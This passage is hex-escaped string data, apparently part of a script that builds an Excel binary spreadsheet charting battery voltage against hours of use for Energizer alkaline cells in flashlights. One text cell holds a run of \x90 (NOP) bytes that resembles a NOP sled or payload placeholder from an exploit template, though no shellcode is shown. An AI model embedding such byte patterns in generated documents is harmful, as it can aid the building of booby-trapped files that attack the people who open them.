"\x0B\x00\x0A\x00\x1A\x00\xEE\x7C\x3F\x35\x5E\xBA\xF4\x3F\x08\x00".
"\x0A\x00\x0A\xFF\x05\x00\x01\x08\x00\x0A\x00\x7E\x02\x0A\x00\x0C".
"\x00\x00\x00\x19\x00\x00\x00\x04\x40\x03\x02\x0E\x00\x0C\x00\x01".
"\x00\x1A\x00\x91\xED\x7C\x3F\x35\x5E\xF4\x3F\x7E\x02\x0A\x00\x0C".
"\x00\x02\x00\x1A\x00\x01\x00\x60\x40\x01\x02\x06\x00\x0C\x00\x03".
"\x00\x1A\x00\x03\x02\x0E\x00\x0C\x00\x04\x00\x1A\x00\x12\x83\xC0".
"\xCA\xA1\x45\xF4\x3F\x03\x02\x0E\x00\x0C\x00\x05\x00\x1A\x00\x25".
"\x06\x81\x95\x43\x8B\xF4\x3F\x01\x02\x06\x00\x0C\x00\x06\x00\x1A".
"\x00\x03\x02\x0E\x00\x0C\x00\x07\x00\x1A\x00\x7D\x3F\x35\x5E\xBA".
"\x49\xF4\x3F\x03\x02\x0E\x00\x0C\x00\x08\x00\x1A\x00\xA6\x9B\xC4".
"\x20\xB0\x72\xF4\x3F\x01\x02\x06\x00\x0C\x00\x09\x00\x1A\x00\x06".
"\x00\x1B\x00\x0C\x00\x0A\x00\x1A\x00\x67\x66\x66\x66\x66\x66\xF4".
"\x3F\x08\x00\x0B\x00\x0A\xFF\x05\x00\x01\x08\x00\x0A\x00\xBD\x00".
"\x18\x00\x0D\x00\x00\x00\x19\x00\x00\x00\x08\x40\x1A\x00\x01\x80".
"\x5F\x40\x1A\x00\x01\xA0\x5F\x40\x02\x00\x01\x02\x06\x00\x0D\x00".
"\x03\x00\x1A\x00\x7E\x02\x0A\x00\x0D\x00\x04\x00\x1A\x00\x01\x60".
"\x5F\x40\x03\x02\x0E\x00\x0D\x00\x05\x00\x1A\x00\xFE\xD4\x78\xE9".
"\x26\x31\xF4\x3F\x01\x02\x06\x00\x0D\x00\x06\x00\x1A\x00\x03\x02".
"\x0E\x00\x0D\x00\x07\x00\x1A\x00\x93\x18\x04\x56\x0E\x2D\xF4\x3F".
"\x03\x02\x0E\x00\x0D\x00\x08\x00\x1A\x00\x12\x83\xC0\xCA\xA1\x45".
"\xF4\x3F\x01\x02\x06\x00\x0D\x00\x09\x00\x1A\x00\x06\x00\x1B\x00".
"\x0D\x00\x0A\x00\x1A\x00\x30\x96\xFC\x62\xC9\x2F\xF4\x3F\x08\x00".
"\x0C\x00\x0A\xFF\x05\x00\x01\x08\x00\x0A\x00\x7E\x02\x0A\x00\x0E".
"\x00\x00\x00\x19\x00\x00\x00\x0C\x40\x03\x02\x0E\x00\x0E\x00\x01".
"\x00\x1A\x00\x96\x43\x8B\x6C\xE7\xFB\xF3\x3F\x03\x02\x0E\x00\x0E".
"\x00\x02\x00\x1A\x00\x7F\x6A\xBC\x74\x93\x18\xF4\x3F\x01\x02\x06".
"\x00\x0E\x00\x03\x00\x1A\x00\x7E\x02\x0A\x00\x0E\x00\x04\x00\x1A".
"\x00\x01\x20\x5F\x40\x03\x02\x0E\x00\x0E\x00\x05\x00\x1A\x00\xC1".
"\xCA\xA1\x45\xB6\xF3\xF3\x3F\x01\x02\x06\x00\x0E\x00\x06\x00\x1A".
"\x00\x03\x02\x0E\x00\x0E\x00\x07\x00\x1A\x00\xC1\xCA\xA1\x45\xB6".
"\xF3\xF3\x3F\x03\x02\x0E\x00\x0E\x00\x08\x00\x1A\x00\xD5\x78\xE9".
"\x26\x31\x08\xF4\x3F\x01\x02\x06\x00\x0E\x00\x09\x00\x1A\x00\x06".
"\x00\x1B\x00\x0E\x00\x0A\x00\x1A\x00\x63\x82\x07\xF3\x44\xFD\xF3".
"\x3F\x08\x00\x0D\x00\x0A\xFF\x05\x00\x01\x08\x00\x0A\x00\x7E\x02".
"\x0A\x00\x0F\x00\x00\x00\x19\x00\x00\x00\x10\x40\xBE\x00\x0C\x00".
"\x0F\x00\x01\x00\x1A\x00\x1A\x00\x1A\x00\x03\x00\x03\x02\x0E\x00".
"\x0F\x00\x04\x00\x1A\x00\x04\x56\x0E\x2D\xB2\x9D\xF3\x3F\x03\x02".
"\x0E\x00\x0F\x00\x05\x00\x1A\x00\x83\xC0\xCA\xA1\x45\xB6\xF3\x3F".
"\x01\x02\x06\x00\x0F\x00\x06\x00\x1A\x00\x7E\x02\x0A\x00\x0F\x00".
"\x07\x00\x1A\x00\x01\xC0\x5E\x40\x03\x02\x0E\x00\x0F\x00\x08\x00".
"\x1A\x00\x02\x2B\x87\x16\xD9\xCE\xF3\x3F\x01\x02\x06\x00\x0F\x00".
"\x09\x00\x1A\x00\x06\x00\x1B\x00\x0F\x00\x0A\x00\x1A\x00\x4E\x62".
"\x10\x58\x39\xB4\xF3\x3F\x08\x00\x0E\x00\x0A\xFF\x05\x00\x01\x08".
"\x00\x0A\x00\x7E\x02\x0A\x00\x10\x00\x00\x00\x19\x00\x00\x00\x12".
"\x40\x03\x02\x0E\x00\x10\x00\x01\x00\x1A\x00\xF0\xA7\xC6\x4B\x37".
"\x89\xF3\x3F\x03\x02\x0E\x00\x10\x00\x02\x00\x1A\x00\x04\x56\x0E".
"\x2D\xB2\x9D\xF3\x3F\x01\x02\x06\x00\x10\x00\x03\x00\x1A\x00\x03".
"\x02\x0E\x00\x10\x00\x04\x00\x1A\x00\xB2\x9D\xEF\xA7\xC6\x4B\xF3".
"\x3F\x03\x02\x0E\x00\x10\x00\x05\x00\x1A\x00\xDB\xF9\x7E\x6A\xBC".
"\x74\xF3\x3F\x01\x02\x06\x00\x10\x00\x06\x00\x1A\x00\x03\x02\x0E".
"\x00\x10\x00\x07\x00\x1A\x00\x31\x08\xAC\x1C\x5A\x64\xF3\x3F\x03".
"\x02\x0E\x00\x10\x00\x08\x00\x1A\x00\x2F\xDD\x24\x06\x81\x95\xF3".
"\x3F\x01\x02\x06\x00\x10\x00\x09\x00\x1A\x00\x06\x00\x1B\x00\x10".
"\x00\x0A\x00\x1A\x00\x7B\x14\xAE\x47\xE1\x7A\xF3\x3F\x08\x00\x0F".
"\x00\x0A\xFF\x05\x00\x01\x08\x00\x0A\x00\x7E\x02\x0A\x00\x11\x00".
"\x00\x00\x19\x00\x00\x00\x14\x40\xBE\x00\x0C\x00\x11\x00\x01\x00".
"\x1A\x00\x1A\x00\x1A\x00\x03\x00\x03\x02\x0E\x00\x11\x00\x04\x00".
"\x1A\x00\xF4\xFD\xD4\x78\xE9\x26\xF3\x3F\x03\x02\x0E\x00\x11\x00".
"\x05\x00\x1A\x00\xDD\x24\x06\x81\x95\x43\xF3\x3F\x01\x02\x06\x00".
"\x11\x00\x06\x00\x1A\x00\x03\x02\x0E\x00\x11\x00\x07\x00\x1A\x00".
"\x89\x41\x60\xE5\xD0\x22\xF3\x3F\x7E\x02\x0A\x00\x11\x00\x08\x00".
"\x1A\x00\x01\x40\x5E\x40\x01\x02\x06\x00\x11\x00\x09\x00\x1A\x00".
"\x06\x00\x1B\x00\x11\x00\x0A\x00\x1A\x00\xED\x7C\x3F\x35\x5E\x3A".
"\xF3\x3F\x08\x00\x10\x00\x0A\xFF\x05\x00\x01\x08\x00\x0A\x00\xBD".
"\x00\x12\x00\x12\x00\x00\x00\x19\x00\x00\x00\x16\x40\x1A\x00\x01".
"\x00\x5D\x40\x01\x00\x03\x02\x0E\x00\x12\x00\x02\x00\x1A\x00\x60".
"\xE5\xD0\x22\xDB\xF9\xF2\x3F\x01\x02\x06\x00\x12\x00\x03\x00\x1A".
"\x00\x7E\x02\x0A\x00\x12\x00\x04\x00\x1A\x00\x01\x40\x5D\x40\x03".
"\x02\x0E\x00\x12\x00\x05\x00\x1A\x00\x0C\x02\x2B\x87\x16\xD9\xF2".
"\x3F\x01\x02\x06\x00\x12\x00\x06\x00\x1A\x00\x03\x02\x0E\x00\x12".
"\x00\x07\x00\x1A\x00\xA2\x45\xB6\xF3\xFD\xD4\xF2\x3F\x7E\x02\x0A".
"\x00\x12\x00\x08\x00\x1A\x00\x01\xC0\x5D\x40\x01\x02\x06\x00\x12".
"\x00\x09\x00\x1A\x00\x06\x00\x1B\x00\x12\x00\x0A\x00\x1A\x00\x3B".
"\x26\x78\x30\x4F\xD4\xF2\x3F\x08\x00\x11\x00\x0A\xFF\x05\x00\x01".
"\x08\x00\x0A\x00\x7E\x02\x0A\x00\x13\x00\x00\x00\x19\x00\x00\x00".
"\x18\x40\xBE\x00\x0C\x00\x13\x00\x01\x00\x1A\x00\x1A\x00\x1A\x00".
"\x03\x00\x03\x02\x0E\x00\x13\x00\x04\x00\x1A\x00\x3F\x35\x5E\xBA".
"\x49\x0C\xF2\x3F\x7E\x02\x0A\x00\x41\x00\x05\x00\x1A\x00\x01\xC0".
"\x5C\x40\x01\x02\x06\x00\x13\x00\x06\x00\x1A\x00\x03\x02\x0E\x00".
"\x13\x00\x07\x00\x1A\x00\x62\x10\x58\x39\xB4\xC8\xF2\x3F\x03\x02".
"\x0E\x00\x13\x00\x08\x00\x1A\x00\x8B\x6C\xE7\xFB\xA9\xF1\xF2\x3F".
"\x01\x02\x06\x00\x13\x00\x09\x00\x1A\x00\x06\x00\x1B\x00\x13\x00".
"\x0A\x00\x1A\x00\x24\x06\x81\x95\x43\x8B\xF2\x3F\x08\x00\x12\x00".
"\x0A\xFF\x05\x00\x01\x08\x00\x0A\x00\x7E\x02\x0A\x00\x14\x00\x00".
"\x00\x19\x00\x00\x00\x1A\x40\x03\x02\x0E\x00\x14\x00\x01\x00\x1A".
"\x00\xEE\x7C\x3F\x35\x5E\xBA\xF1\x3F\x7E\x02\x0A\x00\x14\x00\x02".
"\x00\x1A\x00\x01\x60\x5C\x40\x01\x02\x06\x00\x14\x00\x03\x00\x1A".
"\x00\x7E\x02\x0A\x00\x14\x00\x04\x00\x1A\x00\x01\x20\x5B\x40\x03".
"\x02\x0E\x00\x14\x00\x05\x00\x1A\x00\xAC\x1C\x5A\x64\x3B\xDF\xF1".
"\x3F\x01\x02\x06\x00\x14\x00\x06\x00\x1A\x00\x03\x02\x0E\x00\x14".
"\x00\x07\x00\x1A\x00\xE9\x26\x31\x08\xAC\x1C\xF2\x3F\x03\x02\x0E".
"\x00\x14\x00\x08\x00\x1A\x00\xE7\xFB\xA9\xF1\xD2\x4D\xF2\x3F\x01".
"\x02\x06\x00\x14\x00\x09\x00\x1A\x00\x06\x00\x1B\x00\x14\x00\x0A".
"\x00\x1A\x00\x53\x71\xF6\xE1\x33\xEC\xF1\x3F\x08\x00\x13\x00\x0A".
"\xFF\x05\x00\x01\x08\x00\x0A\x00\xBD\x00\x18\x00\x15\x00\x00\x00".
"\x19\x00\x00\x00\x1C\x40\x1A\x00\x01\x80\x4F\x40\x1A\x00\x01\x00".
"\x5C\x40\x02\x00\x04\x02\x0B\x00\x15\x00\x03\x00\x1A\x00\x03\x00".
"\x59\x65\x73\x03\x02\x0E\x00\x15\x00\x04\x00\x1A\x00\xFE\xD4\x78".
"\xE9\x26\x31\xF0\x3F\x03\x02\x0E\x00\x15\x00\x05\x00\x1A\x00\x35".
"\x5E\xBA\x49\x0C\x02\xF1\x3F\x01\x02\x06\x00\x15\x00\x06\x00\x1A".
"\x00\x7E\x02\x0A\x00\x15\x00\x07\x00\x1A\x00\x00\x00\xF2\x3F\x03".
"\x02\x0E\x00\x15\x00\x08\x00\x1A\x00\xFE\xD4\x78\xE9\x26\x31\xF2".
"\x3F\x01\x02\x06\x00\x15\x00\x09\x00\x1A\x00\x06\x00\x1B\x00\x15".
"\x00\x0A\x00\x1A\x00\x08\xAC\x1C\x5A\x64\x3B\xF0\x3F\x08\x00\x14".
"\x00\x0A\xFF\x05\x00\x01\x08\x00\x0A\x00\x7E\x02\x0A\x00\x16\x00".
"\x00\x00\x19\x00\x00\x00\x1E\x40\xBE\x00\x0C\x00\x16\x00\x01\x00".
"\x1A\x00\x1A\x00\x1A\x00\x03\x00\x7E\x02\x0A\x00\x16\x00\x04\x00".
"\x1A\x00\x01\xC0\x49\x40\x03\x02\x0E\x00\x16\x00\x05\x00\x1A\x00".
"\x8D\x97\x6E\x12\x83\xC0\xE2\x3F\x04\x02\x0B\x00\x16\x00\x06\x00".
"\x1A\x00\x03\x00\x59\x65\x73\x03\x02\x0E\x00\x16\x00\x07\x00\x1A".
"\x00\x35\x5E\xBA\x49\x0C\x02\xF1\x3F\x7E\x02\x0A\x00\x16\x00\x08".
"\x00\x1A\x00\x01\x60\x5B\x40\x01\x02\x06\x00\x16\x00\x09\x00\x1A".
"\x00\x06\x00\x1B\x00\x16\x00\x0A\x00\x1A\x00\xDE\x4F\x8D\x97\x6E".
"\x12\xEA\x3F\x08\x00\x15\x00\x0A\xFF\x05\x00\x01\x08\x00\x0A\x00".
"\x7E\x02\x0A\x00\x17\x00\x00\x00\x19\x00\x00\x00\x20\x40\xBE\x00".
"\x12\x00\x17\x00\x01\x00\x1A\x00\x1A\x00\x1A\x00\x1A\x00\x1A\x00".
"\x1A\x00\x06\x00\x03\x02\x0E\x00\x17\x00\x07\x00\x1A\x00\xB0\x72".
"\x68\x91\xED\x7C\xE3\x3F\x7E\x02\x0A\x00\x17\x00\x08\x00\x1A\x00".
"\x01\x80\x56\x40\x04\x02\x0B\x00\x17\x00\x09\x00\x1A\x00\x03\x00".
"\x59\x65\x73\x06\x00\x1B\x00\x17\x00\x0A\x00\x1A\x00\xBE\x9F\x1A".
"\x2F\xDD\x24\xE8\x3F\x08\x00\x16\x00\x0A\xFE\x05\x00\x01\x08\x00".
"\x0A\x00\x04\x02\x46\x00\x19\x00\x00\x00\x0F\x00\x3E\x00\x90\x90".
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90".
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90".
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90".
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x2E\x04\x02\x47\x00".
"\x1A\x00\x00\x00\x0F\x00\x3F\x00\x56\x6F\x6C\x74\x61\x67\x65\x20".
"\x28\x74\x68\x65\x20\x64\x65\x70\x65\x6E\x64\x65\x6E\x74\x20\x76".
"\x61\x72\x69\x61\x62\x6C\x65\x29\x20\x69\x73\x20\x6F\x6E\x20\x74".
"\x68\x65\x20\x79\x2D\x61\x78\x69\x73\x20\x6F\x66\x20\x74\x68\x65".
"\x20\x67\x72\x61\x70\x68\x2E\xD7\x00\x34\x00\x24\x0F\x00\x00\xCC".
"\x01\x2F\x00\x28\x00\x8F\x00\x20\x00\xF8\x00\xA3\x00\xAE\x00\xB3".
"\x00\x99\x00\x9D\x00\xB3\x00\x9D\x00\xB3\x00\x95\x00\xB7\x00\x95".
"\x00\xA5\x00\x95\x00\xAF\x00\xA2\x00\x96\x00\x72\x00\x4A\x00\x5D".
"\x00\x3E\x00\x01\x00\x00\x00\x05\x00\x02\x00\x16\x06\x00\x00\x62".
"\x00\x1B\x00\xDD\x00\x0A\x00\x9A\x03\x35\x00\xAF\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x09\x41\x01\x00\x40\x00\x01\x01\x00\x00\x08".
"\x00\xC4\x39\x4C\x01\x04\x29\x7A\x01\x00\x00\x00\x00\x44\x28\x4C".
"\x01\x09\x08\x08\x00\x00\x06\x20\x00\xAE\x21\xCD\x07\x14\x00\x00".
"\x00\x15\x00\x00\x00\x83\x00\x02\x00\x00\x00\x84\x00\x02\x00\x00".
"\x00\xA1\x00\x22\x00\x00\x00\x00\x00\x01\x00\x01\x00\x01\x00\x04".
"\x00\x62\x00\x1B\x00\x00\x00\x00\x00\x00\x00\xE0\x3F\x00\x00\x00".
"\x00\x00\x00\xE0\x3F\x00\x00\x33\x00\x02\x00\x03\x00\x12\x00\x02".
"\x00\x00\x00\x16\x00\x02\x00\x01\x00\x17\x00\x02\x00\x01\x02\x01".
"\x10\x02\x00\x00\x00\x02\x10\x10\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\xB0\xCC\xD5\x01\x28\x66\x55\x01\x33\x10\x00\x00\xA0\x00\x04".
"\x00\x01\x00\x01\x00\x32\x10\x04\x00\x00\x00\x03\x00\x33\x10\x00".
"\x00\x07\x10\x0A\x00\x00\x00\x00\x00\x05\x00\xFF\xFF\x08\x00\x0A".
"\x10\x0C\x00\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x34".
"\x10\x00\x00\x03\x10\x0C\x00\x01\x00\x01\x00\x11\x90\x11\x00\x00".
"\x00\x00\x00\x33\x10\x00\x00\x51\x10\x08\x00\x00\x01\x00\x00\x00".
"\x00\x00\x00\x0D\x10\x17\x00\x00\x00\x14\x45\x6E\x65\x72\x67\x69".
"\x7A\x65\x72\x20\x28\x41\x6C\x6B\x61\x6C\x69\x6E\x65\x29\x51\x10".
"\x1D\x00\x01\x02\x00\x00\xA5\x00\x15\x00\x3B\xFF\xFF\x00\x00\x00".
"\x00\x00\x00\x01\x00\x00\x00\x00\x00\x07\x00\x17\x00\x0A\x0A\x51".
"\x10\x1D\x00\x02\x02\x00\x00\xA4\x00\x15\x00\x3B\xFF\xFF\x00\x00".
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x07\x00\x17\x00\x00\x00".
"\x06\x10\x08\x00\xFF\xFF\x00\x00\x01\x00\x00\x00\x33\x10\x00\x00".
"\x07\x10\x0A\x00\x00\x00\xFF\x00\x00\x00\x00\x00\x00\x00\x0A\x10".
"\x0C\x00\xFF\xFF\xFF\x00\x00\x00\x00\x00\x01\x00\x01\x00\x0B\x10".
"\x02\x00\x00\x00\x09\x10\x0C\x00\x00\x00\xFF\x00\x00\x00\xFF\x00".
"\x08\x00\x00\x00\x34\x10\x00\x00\x45\x10\x02\x00\x00\x00\x34\x10".
"\x00\x00\x44\x10\x04\x00\x0A\x00\x00\x00\x46\x10\x02\x00\x01\x00".
"\x41\x10\x12\x00\x00\x00\x85\x02\x00\x00\x0A\x03\x00\x00\x49\x09".
"\x00\x00\x2E\x09\x00\x00\x33\x10\x00\x00\x4F\x10\x14\x00\x02\x00".
"\x02\x00\x38\x01\x00\x00\x66\x02\x00\x00\x96\x0A\x00\x00\x9D\x0B".
"\x00\x00\x1D\x10\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x33\x10\x00\x00\x20\x10\x08\x00".
"\x01\x00\x01\x00\x01\x00\x01\x00\x1E\x10\x1A\x00\x02\x00\x03\x01".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x23\x00\x34\x10\x00\x00\x1D\x10\x12\x00\x01\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x33\x10\x00\x00\x1F\x10\x2A\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x1F\x01\x1E\x10\x1A\x00\x02\x00\x03\x01\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x23\x00".
"\x21\x10\x02\x00\x01\x00\x07\x10\x0A\x00\x00\x00\x00\x00\x00\x00".
"\xFF\xFF\x09\x00\x34\x10\x00\x00\x25\x10\x1A\x00\x02\x02\x01\x00".
"\x00\x00\x00\x00\xA2\x04\x00\x00\x05\x0E\x00\x00\x0F\x05\x00\x00".
"\x3D\x01\x00\x00\x81\x00\x33\x10\x00\x00\x4F\x10\x14\x00\x02\x00".
"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF9\x00\x00\x00\x2C\x00".
"\x00\x00\x26\x10\x02\x00\x06\x00\x51\x10\x08\x00\x00\x01\x00\x00".
"\x00\x00\x00\x00\x0D\x10\x17\x00\x00\x00\x14\x48\x6F\x75\x72\x73".
"\x20\x6F\x66\x20\x62\x61\x74\x74\x65\x72\x79\x20\x75\x73\x65\x27".
"\x10\x06\x00\x03\x00\x00\x00\x00\x00\x34\x10\x00\x00\x25\x10\x1A".
"\x00\x02\x02\x01\x00\x00\x00\x00\x00\x44\x00\x00\x00\xB4\x04\x00".
"\x00\xF4\x00\x00\x00\xDB\x05\x00\x00\x89\x02\x33\x10\x00\x00\x4F".
"\x10\x14\x00\x02\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x2F".
"\x00\x00\x00\xD0\x00\x00\x00\x26\x10\x02\x00\x07\x00\x51\x10\x08".
"\x00\x00\x01\x00\x00\x00\x00\x00\x00\x0D\x10\x12\x00\x00\x00\x0F".
"\x56\x6F\x6C\x74\x61\x67\x65\x20\x28\x76\x6F\x6C\x74\x73\x29\x27".
"\x10\x06\x00\x02\x00\x00\x00\x00\x00\x34\x10\x00\x00\x35\x10\x00".
"\x00\x32\x10\x04\x00\x00\x00\x03\x00\x33\x10\x00\x00\x07\x10\x0A".
"\x00\x80\x80\x80\x00\x00\x00\x00\x00\x00\x00\x0A\x10\x0C\x00\xC0".
"\xC0\xC0\x00\x00\x00\x00\x00\x01\x00\x00\x00\x34\x10\x00\x00\x14".
"\x10\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x33\x10\x00\x00\x18\x10\x02\x00\x00".
"\x00\x22\x10\x0A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0F\x00\x15".
"\x10\x14\x00\x12\x0C\x00\x00\xAC\x06\x00\x00\x6F\x03\x00\x00\xF1".
"\x01\x00\x00\x03\x01\x1F\x00\x33\x10\x00\x00\x4F\x10\x14\x00\x05".
"\x00\x02\x00\x14\x0C\x00\x00\xAE\x06\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x25\x10\x1A\x00\x02\x02\x01\x00\x00\x00\x00\x00\xDC".
"\xFF\xFF\xFF\xCE\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00\xB1".
"\x00\x33\x10\x00\x00\x4F\x10\x14\x00\x02\x00\x02\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x51\x10\x08".
"\x00\x00\x01\x00\x00\x00\x00\x00\x00\x34\x10\x00\x00\x34\x10\x00".
"\x00\x24\x10\x02\x00\x02\x00\x25\x10\x1A\x00\x02\x02\x01\x00\x00".
"\x00\x00\x00\xDC\xFF\xFF\xFF\xCE\xFF\xFF\xFF\x00\x00\x00\x00\x00".
"\x00\x00\x00\xB1\x00\x33\x10\x00\x00\x4F\x10\x14\x00\x02\x00\x02".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x26\x10\x02\x00\x08\x00\x51\x10\x08\x00\x00\x01\x00\x00\x00".
"\x00\x00\x00\x34\x10\x00\x00\x34\x10\x00\x00\x34\x10\x00\x00\x25".
"\x10\x1A\x00\x02\x02\x01\x00\x00\x00\x00\x00\xED\x02\x00\x00\x4F".
"\x00\x00\x00\xC1\x09\x00\x00\x70\x01\x00\x00\x81\x00\x33\x10\x00".
"\x00\x4F\x10\x14\x00\x02\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\xE0\x01\x00\x00\x33\x00\x00\x00\x26\x10\x02\x00\x05\x00\x51".
"\x10\x08\x00\x00\x01\x00\x00\x00\x00\x00\x00\x0D\x10\x24\x00\x00".
"\x00\x21\x46\x6C\x61\x73\x68\x6C\x69\x67\x68\x74\x73\x20\x28\x6D".
"\x65\x64\x69\x75\x6D\x20\x64\x72\x61\x69\x6E\x20\x64\x65\x76\x69".
"\x63\x65\x29\x27\x10\x06\x00\x01\x00\x00\x00\x00\x00\x34\x10\x00".
"\x00\x34\x10\x00\x00\x00\x00\x0A\x00\x00\x00\x22\x00\x00\x00\x01".
"\x00\x00\x00\x03\x02\x0E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x03\x02\x0E\x00\x01\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\xE0\x3F\x03\x02\x0E\x00\x02\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\xF0\x3F\x03\x02\x0E\x00\x03\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF8\x3F\x03\x02\x0E\x00\x04".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x03\x02\x0E".
"\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x40\x03".
"\x02\x0E\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08".
"\x40\x03\x02\x0E\x00\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x0C\x40\x03\x02\x0E\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x10\x40\x03\x02\x0E\x00\x09\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x12\x40\x03\x02\x0E\x00\x0A\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x14\x40\x03\x02\x0E\x00\x0B\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x16\x40\x03\x02\x0E\x00\x0C".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x18\x40\x03\x02\x0E".
"\x00\x0D\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1A\x40\x03".
"\x02\x0E\x00\x0E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1C".
"\x40\x03\x02\x0E\x00\x0F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x1E\x40\x03\x02\x0E\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x20\x40\x03\x02\x0E\x00\x11\x00\x00\x00\x00\x00\xB5".
"\x81\x4E\x1B\xE8\xB4\xF9\x3F\x03\x02\x0E\x00\x12\x00\x00\x00\x00".
"\x00\x71\x3D\x0A\xD7\xA3\x70\xF6\x3F\x03\x02\x0E\x00\x13\x00\x00".
"\x00\x00\x00\x79\xE9\x26\x31\x08\xAC\xF5\x3F\x03\x02\x0E\x00\x14".
"\x00\x00\x00\x00\x00\xAA\xF1\xD2\x4D\x62\x10\xF5\x3F\x03\x02\x0E".
"\x00\x15\x00\x00\x00\x00\x00\xEE\x7C\x3F\x35\x5E\xBA\xF4\x3F\x03".
"\x02\x0E\x00\x16\x00\x00\x00\x00\x00\x67\x66\x66\x66\x66\x66\xF4".
"\x3F\x03\x02\x0E\x00\x17\x00\x00\x00\x00\x00\x30\x96\xFC\x62\xC9".
"\x2F\xF4\x3F\x03\x02\x0E\x00\x18\x00\x00\x00\x00\x00\x63\x82\x07".
"\xF3\x44\xFD\xF3\x3F\x03\x02\x0E\x00\x19\x00\x00\x00\x00\x00\x4E".
"\x62\x10\x58\x39\xB4\xF3\x3F\x03\x02\x0E\x00\x1A\x00\x00\x00\x00".
"\x00\x7B\x14\xAE\x47\xE1\x7A\xF3\x3F\x03\x02\x0E\x00\x1B\x00\x00".
"\x00\x00\x00\xED\x7C\x3F\x35\x5E\x3A\xF3\x3F\x03\x02\x0E\x00\x1C".
"\x00\x00\x00\x00\x00\x3B\x26\x78\x30\x4F\xD4\xF2\x3F\x03\x02\x0E".
"\x00\x1D\x00\x00\x00\x00\x00\x24\x06\x81\x95\x43\x8B\xF2\x3F\x03".
"\x02\x0E\x00\x1E\x00\x00\x00\x00\x00\x53\x71\xF6\xE1\x33\xEC\xF1".
"\x3F\x03\x02\x0E\x00\x1F\x00\x00\x00\x00\x00\x08\xAC\x1C\x5A\x64".
"\x3B\xF0\x3F\x03\x02\x0E\x00\x20\x00\x00\x00\x00\x00\xDE\x4F\x8D".
"\x97\x6E\x12\xEA\x3F\x03\x02\x0E\x00\x21\x00\x00\x00\x00\x00\xBE".
"\x9F\x1A\x2F\xDD\x24\xE8\x3F\x0A\x00\x00\x00\x3D\x00\x12\x00\x00".
"\x00\x30\x00\xAC\x2F\xF4\x1A\x38\x00\x00\x00\x00\x00\x01\x00\x58".
"\x02\x3E\x02\x0A\x00\xB6\x06\x00\x00\x00\x00\x00\x00\x00\x00\x1D".
"\x00\x0F\x00\x03\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00".
"\x00\x00\xAB\x00\x22\x00\x20\x00\x48\xFE\xFF\xFF\xFF\xFF\xFF\xFF".
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF".
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x0A\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
